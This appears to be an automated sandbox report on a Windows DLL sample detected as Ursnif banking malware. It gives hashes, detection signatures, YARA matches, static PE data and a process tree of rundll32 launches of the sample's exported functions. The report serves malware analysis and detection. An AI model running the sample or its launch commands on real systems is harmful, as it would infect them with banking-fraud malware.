Play interactive tour

Edit tour

Analysis Report WoyEsA8v7H.dll

Overview

General Information

Sample Name:	WoyEsA8v7H.dll
Analysis ID:	432585
MD5:	5a414b378a75f928594e1ddacccb40dc
SHA1:	341a60d3181bf62aa8344f4544598f7e217c1b03
SHA256:	0d4d60b0de26c90819f65b22796c1600e4942e95952c6cf19f2618b0461a441f
Tags:	dllGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5300 cmdline: loaddll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 5284 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4968 cmdline: rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5688 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5212 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 4872 cmdline: rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Connectdark MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2996 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 4228 cmdline: rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Mindlake MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5656 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4660 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 4012 cmdline: rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Porthigh MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5424 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 1968 cmdline: rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Problemscale MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6028 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6180 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 1532 cmdline: rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,WingGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5668 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6192 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2168 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6200 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
WoyEsA8v7H.dll	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000015.00000002.590312640.000000006E1A1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000000D.00000002.552879000.000000006E1A1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000010.00000002.545510346.000000006E1A1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.6e1a0000.0.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.6e1a0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
22.2.rundll32.exe.6e1a0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
21.2.rundll32.exe.6e1a0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
16.2.rundll32.exe.6e1a0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
13.2.rundll32.exe.6e1a0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: WoyEsA8v7H.dll

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: WoyEsA8v7H.dll

Virustotal: Detection: 57%

Perma Link

Source: WoyEsA8v7H.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: WoyEsA8v7H.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\938\follow-Record\Suffix\observe-element\force.pdb source: loaddll32.exe, 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.572048905.000000006E22A000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000002.573441286.000000006E22A000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.590367644.000000006E22A000.00000002.00020000.sdmp, rundll32.exe, 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp, WoyEsA8v7H.dll

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: WoyEsA8v7H.dll, type: SAMPLE
Source: Yara match	File source: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.590312640.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.552879000.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.545510346.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: WoyEsA8v7H.dll, type: SAMPLE
Source: Yara match	File source: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.590312640.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.552879000.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.545510346.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E3E00	0_2_6E1E3E00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2167D9	0_2_6E2167D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E1C3C	0_2_6E1E1C3C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2084BB	0_2_6E2084BB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2202BC	0_2_6E2202BC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E210396	0_2_6E210396
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1FE079	0_2_6E1FE079
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F5150	0_2_6E1F5150
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1E3E00	2_2_6E1E3E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1E1C3C	2_2_6E1E1C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2167D9	2_2_6E2167D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2084BB	2_2_6E2084BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2202BC	2_2_6E2202BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E210396	2_2_6E210396
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1FE079	2_2_6E1FE079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1F5150	2_2_6E1F5150
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1E3E00	22_2_6E1E3E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1E1C3C	22_2_6E1E1C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E2167D9	22_2_6E2167D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E2084BB	22_2_6E2084BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E2202BC	22_2_6E2202BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E210396	22_2_6E210396
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1FE079	22_2_6E1FE079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1F5150	22_2_6E1F5150

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1E0990 appears 32 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1E00AC appears 100 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1E0990 appears 68 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1E00E0 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1E00AC appears 200 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E2023A9 appears 36 times

Source: WoyEsA8v7H.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal64.troj.winDLL@54/0@0/0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4576:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_01

Source: WoyEsA8v7H.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Connectdark

Source: WoyEsA8v7H.dll

Virustotal: Detection: 57%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Connectdark
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Mindlake
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Porthigh
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Problemscale
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,WingGrass
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Connectdark	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Mindlake	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Porthigh	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Problemscale	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,WingGrass	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: WoyEsA8v7H.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: WoyEsA8v7H.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: WoyEsA8v7H.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: WoyEsA8v7H.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: WoyEsA8v7H.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: WoyEsA8v7H.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: WoyEsA8v7H.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: WoyEsA8v7H.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: WoyEsA8v7H.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WoyEsA8v7H.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WoyEsA8v7H.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WoyEsA8v7H.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WoyEsA8v7H.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: WoyEsA8v7H.dll

Static PE information: real checksum: 0xf3990 should be: 0xef6d5

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E0075 push ecx; ret	0_2_6E1E0088
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E09D6 push ecx; ret	0_2_6E1E09E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1E09D6 push ecx; ret	2_2_6E1E09E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1E0075 push ecx; ret	2_2_6E1E0088
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1E09D6 push ecx; ret	22_2_6E1E09E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1E0075 push ecx; ret	22_2_6E1E0088

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: WoyEsA8v7H.dll, type: SAMPLE
Source: Yara match	File source: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.590312640.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.552879000.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.545510346.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
